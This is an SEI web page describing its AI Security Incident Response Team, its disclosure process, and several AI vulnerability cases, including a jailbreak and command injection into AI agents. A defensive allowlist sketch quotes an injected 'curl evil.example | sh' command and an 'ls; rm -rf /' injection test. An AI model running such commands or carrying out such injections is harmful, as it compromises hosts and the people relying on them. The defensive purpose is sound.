
AISIRT Advances National Security with Secure AI

Created November 2023 • Updated March 2025

In November 2023, the Software Engineering Institute (SEI) established the first Artificial Intelligence Security Incident Response Team (AISIRT) to increase the safety and security of the artificial intelligence (AI) systems used by the Department of Defense (DoD) and other federal agencies. The AISIRT advances the strategic advantage of AI by providing the DoD and other federal agencies with the capability to identify, analyze, and respond to the threats, vulnerabilities, and incidents that emerge from ongoing advances in AI and machine learning (ML). In operating the AISIRT, the SEI leverages both its expertise in cybersecurity and AI and its decades-long track record of coordinated vulnerability disclosure (CVD) and of building cyber incident response capabilities and teams across the globe.

AI Creates New Capabilities, but Also New Risks

As the DoD integrates AI throughout its work and seeks to extend the strategic advantage AI provides, it must contend with the fact that secure and effective adoption and use of AI capabilities are not guaranteed.

Improper development, implementation, or use of AI can have disastrous consequences that threaten the economic health, societal well-being, and security of the nation. In fact, several large-scale AI and ML vulnerabilities have already had far-reaching impacts, and such events are likely to proliferate as AI rapidly evolves and more federal agencies embrace its potential to advance their work.

To provide the DoD—and the nation—with a capability for addressing the risks introduced by the rapid growth and widespread use of AI, the SEI formed a first-of-its-kind AISIRT.

AISIRT: A Collaboration Between the SEI, Carnegie Mellon University, and Others

The AISIRT is part of Carnegie Mellon University's (CMU's) coordinated effort to advance AI, and it involves collaboration between researchers at the SEI and CMU. CMU is a leading academic and research institution in computer science and engineering, AI, and cybersecurity. The AISIRT also collaborates with divisions across the SEI and leverages the SEI's extensive coordination network of approximately 5,400 industry partners, including 4,400 vendors and 1,000 security researchers, as well as various government organizations.

AISIRT Provides Protection as AI Evolves

The goal of the SEI’s AISIRT is to lead a community-focused research and development effort to ensure the secure and effective development and use of AI technologies for the DoD—and beyond—as these technologies continue to evolve and grow. The AISIRT continuously monitors threats and security incidents that arise from AI and ML systems, and it performs incident analysis, response, and vulnerability mitigation to develop mechanisms that keep AI and ML systems safe and secure. It focuses on many kinds of AI systems, including those that affect commerce, but most importantly on systems that concern critical infrastructure, defense, and national security.

Since its founding in 2023, the AISIRT has developed guidance on how to use CVD to manage AI vulnerabilities. Once a vulnerability has been discovered, reproduced, and reported, the CVD process includes validating the vulnerability, coordinating a response with all relevant stakeholders, making the public aware of the vulnerability (if appropriate), and deploying a solution or workaround. Through this process, the AISIRT has supported the response to 103 community-reported AI vulnerabilities. Significant vulnerabilities that the AISIRT has helped address include the following:

  • jailbreak vulnerability: After a user reported a large language model (LLM) guardrail bypass vulnerability, the AISIRT engaged the LLM's developers to address the issue. Working with the developers, the AISIRT ensured that mitigation measures were put in place, particularly to prevent future time-based jailbreak attacks.
  • GPU API vulnerability: AI systems rely on specialized hardware with specific application programming interfaces (APIs) and software development kits (SDKs), a dependence that introduces unique risks. For instance, the LeftoverLocals vulnerability allowed attackers to use a GPU-specific API to read leftover data in GPU memory and extract LLM responses, potentially exposing sensitive information. The AISIRT worked with stakeholders, leading to an update in the Khronos standard that mitigates future risks in GPU memory management.
  • command injection vulnerability: These vulnerabilities, a subset of prompt injection, primarily target AI environments that accept user input, such as chatbots or AI agents. A malicious user can craft a chat prompt that injects malicious code or other unwanted commands, which can compromise the AI environment or even the entire host system; a sketch of this pattern and a basic mitigation follows this list. One such vulnerability was reported to the AISIRT by security researchers. The AISIRT collaborated with the vendor to implement security measures through policy updates and the use of appropriate sandbox environments to protect against such threats.
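
To make the command injection pattern concrete, the sketch below (in Python) contrasts the naive approach, in which model output is handed directly to a shell, with a simple allowlist that never invokes a shell. The function name, allowlist, and commands are illustrative assumptions for exposition only; they are not any vendor's API or the AISIRT's tooling.

    # Illustrative sketch: executing model-suggested commands safely.
    # The allowlist and function below are hypothetical examples.
    import shlex
    import subprocess

    # A naive agent might run: subprocess.run(model_output, shell=True).
    # A crafted prompt such as "list files; curl evil.example | sh" would
    # then execute attacker-chosen commands with the agent's privileges.

    ALLOWED_COMMANDS = {"ls", "cat", "grep"}  # explicit policy allowlist

    def run_agent_command(model_output: str) -> subprocess.CompletedProcess:
        """Run a model-suggested command only if policy permits it."""
        argv = shlex.split(model_output)  # tokenize; no shell expansion
        if not argv or argv[0] not in ALLOWED_COMMANDS:
            raise PermissionError(f"command not permitted: {model_output!r}")
        # shell=False keeps ';', '|', and '&&' from chaining commands; a
        # real deployment would also sandbox the process (container, jail).
        return subprocess.run(argv, shell=False, capture_output=True,
                              text=True, timeout=10)

    if __name__ == "__main__":
        print(run_agent_command("ls -l").stdout)   # permitted command
        try:
            run_agent_command("ls; rm -rf /")      # injection attempt
        except PermissionError as err:
            print(err)

In practice, an allowlist like this would be only one layer of defense; the policy updates and sandbox environments mentioned above add containment so that even a permitted command cannot affect the rest of the system.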

To deliver solutions to these and other vulnerabilities, the AISIRT draws on the team's deep technical expertise while leveraging the SEI's vast partnership network, which includes software vendors such as Google and Microsoft, many AI and ML vendors, and military, government, industry, and academic organizations.
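
As a rough illustration of the CVD stages described earlier, the sketch below models a reported vulnerability moving from report through validation, coordination, optional public disclosure, and remediation. The state names, transitions, and case identifier are hypothetical, chosen for exposition; they do not represent the AISIRT's actual case-tracking system.

    # Hypothetical sketch of a CVD case moving through the stages
    # described above; not the AISIRT's actual tooling.
    from enum import Enum, auto

    class CVDState(Enum):
        REPORTED = auto()      # discovered, reproduced, and reported
        VALIDATED = auto()     # coordinator confirms the vulnerability
        COORDINATING = auto()  # stakeholders develop a fix together
        DISCLOSED = auto()     # public advisory issued, if appropriate
        REMEDIATED = auto()    # solution or workaround deployed

    # Only forward transitions through the process are permitted;
    # public disclosure may be skipped when it is not appropriate.
    _TRANSITIONS = {
        CVDState.REPORTED: {CVDState.VALIDATED},
        CVDState.VALIDATED: {CVDState.COORDINATING},
        CVDState.COORDINATING: {CVDState.DISCLOSED, CVDState.REMEDIATED},
        CVDState.DISCLOSED: {CVDState.REMEDIATED},
        CVDState.REMEDIATED: set(),
    }

    class CVDCase:
        """Tracks one reported vulnerability through the CVD process."""

        def __init__(self, case_id: str) -> None:
            self.case_id = case_id
            self.state = CVDState.REPORTED

        def advance(self, new_state: CVDState) -> None:
            if new_state not in _TRANSITIONS[self.state]:
                raise ValueError(f"{self.state.name} -> {new_state.name} "
                                 "is not a valid CVD transition")
            self.state = new_state

    if __name__ == "__main__":
        case = CVDCase("CASE-2025-0001")  # hypothetical identifier
        for step in (CVDState.VALIDATED, CVDState.COORDINATING,
                     CVDState.DISCLOSED, CVDState.REMEDIATED):
            case.advance(step)
            print(case.case_id, "->", case.state.name)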

Looking Ahead

The AISIRT fills an immediate and ongoing need to ensure that AI is safe and secure, contributes to the growth of our nation, and continues to evolve in an ethical and responsible way. Going forward, the AISIRT will continue to address AI vulnerabilities and facilitate solutions while also advancing the state of AI security in emerging areas such as AI digital forensics and incident response, AI assurance, and AI red-teaming.

“We are working to extend cybersecurity best practices, such as coordinated vulnerability disclosure, to AI,” said Lauren McIlvenny, who leads AISIRT as the technical director of threat analysis in the SEI’s CERT Division. “We are also performing cutting-edge research to stay ahead of the expanding set of critical issues and attack vectors born of the rapid adoption of AI-enabled systems in consumer, commercial, and national security applications.”

Learn More

AI Hygiene Starts with Models and Data Loaders

White Paper

This paper issues a call to action to apply traditional cybersecurity tools and techniques to artificial intelligence (AI) to improve the cybersecurity of AI systems.

Protecting AI from the Outside In: The Case for Coordinated Vulnerability Disclosure

Blog Post

This post highlights lessons learned from applying the coordinated vulnerability disclosure (CVD) process to reported vulnerabilities in AI and ML systems.

Best Practices and Lessons Learned in Standing Up an AISIRT

Podcast

In the wake of widespread adoption of AI in critical infrastructure, this podcast shares best practices and lessons learned in standing up an AI Security Incident Response Team (AISIRT).

The Challenge of Adversarial Machine Learning

Blog Post

This SEI Blog post examines how machine learning systems can be subverted through adversarial machine learning, the motivations of adversaries, and what researchers are doing to mitigate such attacks.

Adversarial ML Threat Matrix: Adversarial Tactics, Techniques, and Common Knowledge of Machine Learning

Blog Post

This SEI Blog post introduces the Adversarial ML Threat Matrix, a list of tactics used to exploit machine learning models, and offers guidance on defending against them.
